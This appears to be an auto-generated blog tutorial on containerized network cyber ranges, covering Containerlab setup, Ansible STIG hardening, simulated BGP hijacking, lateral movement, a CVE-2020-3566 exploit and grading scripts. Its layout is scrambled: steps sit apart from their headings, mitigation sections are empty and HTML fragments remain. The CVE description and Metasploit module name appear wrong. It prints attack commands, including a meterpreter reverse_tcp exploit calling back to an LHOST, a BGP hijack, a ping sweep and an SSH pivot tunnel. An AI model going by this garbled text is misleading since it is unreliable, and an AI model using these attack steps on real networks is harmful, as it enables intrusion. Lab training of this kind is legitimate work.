Listen to this Post

Introduction
The rapid adoption of containerized Network Operating Systems (NOS) has created an urgent demand for live, hands-on training across diverse, multi‑vendor topologies. Traditional orchestration tools often fall short in delivering the flexibility required for realistic cybersecurity exercises. A new generation of cyber ranges now addresses this gap by providing portable appliances that support Cisco, Juniper, Arista, F5, Palo Alto, and more—allowing users to apply STIGs, configure security policies, simulate protocol attacks, practice lateral movement, and exploit vulnerabilities, all within a self‑contained environment that includes automated grading. This article explores how you can leverage such containerized platforms to build your own advanced training lab and master the skills needed to defend modern networks.
Learning Objectives
- Understand the architecture and deployment of containerized network operating systems in a cyber range.
- Learn to harden multi‑vendor network devices using Security Technical Implementation Guides (STIGs) and automation.
- Execute realistic attack scenarios—including protocol manipulation, lateral movement, and vulnerability exploitation—and implement corresponding mitigations.
- Setting Up a Containerized Network Lab with Containerlab and vrnetlab
To create a flexible, container‑based network environment, we can use open‑source tools like Containerlab and vrnetlab. These tools allow you to run containerized versions of popular network OS images (Cisco IOSv, Juniper vSRX, Arista vEOS, etc.) on a single Linux host.
Step‑by‑step guide
1. Install Containerlab (requires Docker and Go):
curl -sL https://containerlab.dev/setup | sudo -E bash -s "all"
- Pull or build vendor container images using vrnetlab. For example, to create a Cisco IOSv image:
git clone https://github.com/plajjan/vrnetlab.git cd vrnetlab/cisco/iosv Place the IOSv .vmdk disk image in this directory make docker-image
3. Define a topology file (`lab.clab.yml`):
name: cyber-range topology: nodes: router1: kind: cisco_iosv image: vrnetlab/cisco_iosv:latest exec: - config t - hostname R1 - interface g0/0 - ip address 10.0.1.1 255.255.255.0 - no shutdown fw1: kind: paloalto_vm image: vrnetlab/paloalto_vm:latest exec: - configure - set system hostname PA-FW1 - set interface ethernet1/1 ip 10.0.1.2/24 links: - endpoints: ["router1:g0/0", "fw1:eth1/1"]
4. Deploy the lab:
sudo containerlab deploy -t lab.clab.yml
5. Verify connectivity by logging into each node:
sudo containerlab exec -t lab.clab.yml --label clab-node-name=router1 -- /bin/bash
This setup provides a lightweight, reproducible environment that mirrors real hardware configurations, perfect for security exercises.
- Applying STIGs to Network Devices: Automated Hardening with Ansible
STIGs (Security Technical Implementation Guides) are the gold standard for hardening network infrastructure. Using Ansible, we can automate the application of STIG controls to our containerized devices.
Example: Cisco IOS STIG compliance checks
1. Install Ansible and required collections:
pip install ansible ansible-galaxy collection install cisco.ios
2. Create an inventory file (`hosts.ini`):
[bash] router1 ansible_host=10.0.1.1 ansible_network_os=cisco.ios.ios ansible_user=admin ansible_password=admin [routers:vars] ansible_connection=ansible.netcommon.network_cli
- Write a playbook (
stig_hardening.yml) to enforce basic STIG controls:</li> </ol> - name: Apply STIGs to Cisco Router hosts: routers gather_facts: no tasks: - name: Ensure telnet is disabled cisco.ios.ios_config: lines: - no service telnet - no transport input telnet parents: line vty 0 4 <ul> <li>name: Enable SSH and set version 2 cisco.ios.ios_config: lines:</li> <li>ip ssh version 2</li> <li>crypto key generate rsa modulus 2048</p></li> <li><p>name: Enable logging and NTP cisco.ios.ios_config: lines:</p></li> <li>logging 192.168.1.100</li> <li>ntp server 10.0.0.1
- Set up three routers in a simple BGP topology: AS 100 (attacker), AS 200 (victim), and AS 300 (transit). Use Containerlab to define them.
-
Configure BGP on each router (e.g., Cisco IOS commands):
router bgp 200 neighbor 10.0.2.2 remote-as 300 network 192.168.1.0 mask 255.255.255.0
-
Simulate the hijack from the attacker router (AS 100):
router bgp 100 neighbor 10.0.3.2 remote-as 300 network 192.168.1.0 mask 255.255.255.0
-
Observe the impact by checking routing tables on the transit router:
show ip bgp 192.168.1.0/24
-
Mitigate by implementing prefix filtering and RPKI (using
bgp bestpath prefix-validate). Example prefix list on transit router:ip prefix-list FILTER deny 192.168.1.0/24 ip prefix-list FILTER permit any neighbor 10.0.2.1 prefix-list FILTER in
-
Verify that the hijacked route is no longer accepted.
- Gain initial access (simulate via SSH with known credentials):
ssh admin@switch1
-
Scan internal network from the switch using a simple script or ping sweep:
for i in {1..254}; do ping -c 1 10.1.1.$i | grep "64 bytes" & done -
Establish SSH tunneling to reach the firewall’s management interface:
ssh -L 8443:10.1.1.2:443 admin@switch1
Now the attacker can access the firewall’s web interface via `https://localhost:8443` from their machine.
- Restrict SSH access with ACLs on the switch:
access-list 100 permit tcp host 10.0.0.10 host 10.1.1.1 eq 22 access-list 100 deny tcp any any eq 22 line vty 0 4 access-class 100 in
- Enable management plane protection on the firewall to limit source IPs.
- Exploiting Vulnerabilities: CVE-2020-3566 (Cisco IOS XE RCE) Simulation
- Deploy a vulnerable Cisco IOS XE image in your container lab (e.g., version 16.12.1 with DHCP enabled).
- Post‑exploitation – once a session is obtained, gather information or pivot.
- Upgrade to a patched IOS XE version.
- Apply control plane policing (CoPP) to limit DHCP traffic:
class-map match-all DHCP-CLASS match protocol dhcp policy-map CoPP-POLICY class DHCP-CLASS police 10000 conform-action transmit exceed-action drop control-plane service-policy input CoPP-POLICY
- Verify that the exploit no longer works after applying the patch or CoPP.
- Grading and Assessment: Automating Skill Validation with Scoring Engines
- After a student completes hardening tasks, run a validation script:
from netmiko import ConnectHandler device = { 'device_type': 'cisco_ios', 'ip': '10.0.1.1', 'username': 'admin', 'password': 'admin' } connection = ConnectHandler(device) output = connection.send_command('show running-config | include telnet') if 'telnet' in output: print('FAIL: Telnet is still enabled') else: print('PASS: Telnet disabled') connection.disconnect() -
Integrate with a CTF platform via REST API to award points.
-
Provide immediate feedback to learners, allowing them to retry until successful.
- Portable Appliance: Deploying the Cyber Range on a Laptop or Server
- Resource planning: Each containerized router typically requires 512 MB–2 GB RAM. A full lab might need 16 GB+.
- Snapshots: Use filesystem snapshots (e.g., ZFS on Proxmox) to instantly reset the lab after each student session.
- Network isolation: Create isolated bridge networks (e.g.,
lab_net) to prevent interference with production networks. - Automation: Use `vagrant` or `ansible-pull` to rebuild the lab on demand.
- Create a VM with Ubuntu 22.04, install Docker and Containerlab.
- Use `docker commit` to save the state of configured images.
- Provide a web interface (e.g., Guacamole) for students to access consoles.
- Key Takeaway 1: Containerized network OS ranges make enterprise‑grade security training accessible, portable, and scalable—eliminating the need for expensive physical hardware.
- Key Takeaway 2: Automated grading and STIG integration ensure that learners not only practice attacks but also master the compliance and hardening skills demanded by real‑world security roles.
4. Run the playbook:
ansible-playbook -i hosts.ini stig_hardening.yml
This approach ensures consistent, repeatable hardening across all devices, critical for both training and production environments.
3. Simulating Protocol Attacks: BGP Hijacking and Mitigation
BGP hijacking remains a top threat. In your container lab, you can simulate this attack and practice defense.
Step‑by‑step guide
This exercise teaches real‑world BGP security and the importance of route filtering.
4. Lateral Movement Techniques in a Virtual Network
Attackers often move laterally after compromising an edge device. In a containerized environment, you can simulate this and test detection.
Scenario: Attacker compromises a switch and uses it to pivot to an internal firewall.
4. Mitigation:
This exercise demonstrates how a single compromised device can become a gateway to critical infrastructure.
CVE-2020-3566 is a critical remote code execution vulnerability in Cisco IOS XE’s DHCP service. Simulating its exploitation reinforces patching and mitigation strategies.
2. Use Metasploit to exploit it:
msfconsole use exploit/linux/http/cisco_ios_xe_rce set RHOSTS 10.0.1.1 set payload linux/x86/meterpreter/reverse_tcp set LHOST 10.0.0.2 exploit
4. Mitigation:
This lab highlights the importance of timely patching and defense‑in‑depth.
A key feature of modern cyber ranges is automated grading. You can integrate a scoring engine like CTFd or a custom Python script to validate student actions.
Example: Custom Python grader for STIG compliance
Grading ensures that training objectives are met and skills are objectively measured.
To make the range truly portable, you can package it as a virtual appliance using Proxmox, VMware, or even a Docker‑compose stack.
Key considerations:
Example Proxmox setup:
This approach turns any laptop or server into a full‑fledged cyber range.
What Undercode Say
The convergence of containerization, automation, and gamified learning is reshaping cybersecurity education. By enabling hands‑on experience with multi‑vendor devices and realistic threat scenarios, such platforms produce professionals who are ready to defend against sophisticated adversaries. The ability to instantly reset environments, measure progress, and simulate entire attack chains will soon become the standard for both individual upskilling and corporate red/blue team exercises. As the complexity of networks grows, so must the realism and rigor of our training—containerized cyber ranges are the answer.
Prediction
Within the next three years, cyber‑range‑as‑a‑service (CRaaS) will be embedded in every major security operations center’s training program. AI‑driven scenario generation will tailor attacks to an organization’s specific infrastructure, while continuous integration with threat intelligence feeds will keep exercises current with emerging vulnerabilities. The line between training and operational readiness will blur, enabling proactive defense validation and continuous skill certification.
▶️ Related Video (78% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Brian Markus – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


